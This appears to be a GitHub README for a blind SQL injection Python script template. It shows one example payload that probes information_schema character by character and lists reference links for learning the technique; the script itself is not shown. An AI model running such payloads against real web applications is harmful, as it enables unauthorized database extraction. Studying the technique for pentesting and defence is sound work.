Skip to content

Latest commit

 

History

History
26 lines (15 loc) · 748 Bytes

File metadata and controls

26 lines (15 loc) · 748 Bytes

AutoBlindSQLInjection-Template

Blind SQL Injection Python Script Template

Example SQLI Payload

' and Ascii(substring((Select count(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))=56

Exploit Code POC Example

alt text

References

Video Reference John Hammond :

https://www.youtube.com/watch?v=14eE7LSHlKc

Example Blind Injection Payloads Blog :

https://www.securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html

Test Run Payload Here :

https://www.w3schools.com/mysql/mysql_limit.asp